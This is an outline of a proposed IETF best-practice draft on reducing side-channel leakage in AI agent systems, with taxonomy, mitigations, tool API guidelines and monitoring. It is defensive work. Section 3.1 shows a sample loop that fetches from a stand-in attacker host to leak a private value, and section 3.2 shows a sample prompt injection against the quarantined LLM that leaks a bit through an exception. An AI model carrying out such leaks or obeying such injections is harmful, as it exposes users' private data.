ietf-draft-analyzer/data/reports/draft-proposals/camel-inspired/06-side-channel-mitigation.md

---
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---

# Side-Channel Mitigation Framework for AI Agent Interactions

## 1. Problem Statement

Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
3. **Timing side-channels**: an adversary infers private values from execution timing differences

These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.

This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.

## 2. Scope

This document provides:

1. A **taxonomy of side-channel risks** specific to AI agent systems
2. **Mitigation strategies** for each risk category
3. **Tool API design guidelines** that minimize side-channel exposure
4. **Monitoring patterns** for detecting side-channel exploitation
5. **STRICT vs. NORMAL mode** recommendations

## 3. Side-Channel Taxonomy

### 3.1 External Resource Inference

**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value.

**CaML context**: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var` and policies can block it.

**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).

```
Attacker's Server
     │
     │  GET /cat.jpg  ×10  ← private_var = 10
     │  GET /cat.jpg  ×20  ← private_var = 20
     │
     └── attacker infers private_var by counting requests
```

### 3.2 Exception-Based Bit Leaking

**Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.

**CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).

```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception
```

**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).

### 3.3 Timing Side-Channels

**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.

**CaML context**: CaML's restricted Python subset doesn't include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

**Bandwidth**: depends on timing precision — generally low but non-zero.

### 3.4 Agent-Specific Side Channels (Beyond CaML)

| Channel | Attack Vector | Bandwidth |
|---------|--------------|-----------|
| **Token usage** | Private data influences response length → observable token count | Medium |
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
| **Error message content** | Error details leak through supposedly sanitized channels | High |
| **Model confidence** | Probability distributions in structured output leak information | Low |
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |

## 4. Mitigation Strategies

### 4.1 STRICT Mode Execution

**Recommendation: Use STRICT mode for all security-sensitive agent operations.**

In STRICT mode:

- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
- This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
- Security policies can detect and block the side-channel

**Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.

### 4.2 Exception Handling Hardening

**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**

Exceptions create side channels because they halt execution. Instead:

```python
# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except:
    pass  # attacker observes: was email sent?

# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way
```

Agent frameworks SHOULD:
- Use `Result`/`Either` types instead of exceptions for Processor outputs
- Ensure both success and failure paths make the same external observations
- Redact exception messages before they reach the Planner

### 4.3 Constant-Pattern Tool Calls

**Recommendation: Where feasible, make tool call patterns independent of private data.**

- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to fixed lengths for sensitive operations

### 4.4 External Request Restrictions

**Recommendation: Restrict which external endpoints agents can contact.**

- Allowlist approved external domains
- Proxy all external requests through a controlled gateway
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection

## 5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

### 5.1 Do

- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document trust levels of output fields (which are public, which are private)

### 5.2 Don't

- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Use response timing that depends on input sensitivity
- Expose iteration counts or batch sizes in responses

### 5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

```json
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
```

## 6. Monitoring Patterns

### 6.1 Anomaly Detection Signals

| Signal | Potential Attack | Action |
|--------|-----------------|--------|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side-channel | Log + investigate |
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |

### 6.2 Monitoring Architecture

```
Agent Execution
     │
     ├──► Side-Channel Monitor
     │       ├── Request pattern analyzer
     │       ├── Exception rate tracker
     │       ├── Timing variance detector
     │       └── Tool call pattern validator
     │              │
     │              ▼
     │         Alert / Halt Decision
     │
     ▼
Normal execution continues (if no anomaly)
```

## 7. Relationship to Other Drafts

| Draft | Side-Channel Relevance |
|-------|----------------------|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |

## 8. Security Considerations

This entire document is about security. Key meta-considerations:

- Side-channel mitigation is **defense in depth** — no single measure eliminates all channels
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)

## 9. Open Questions

1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How to stay ahead?
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than single-agent)?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.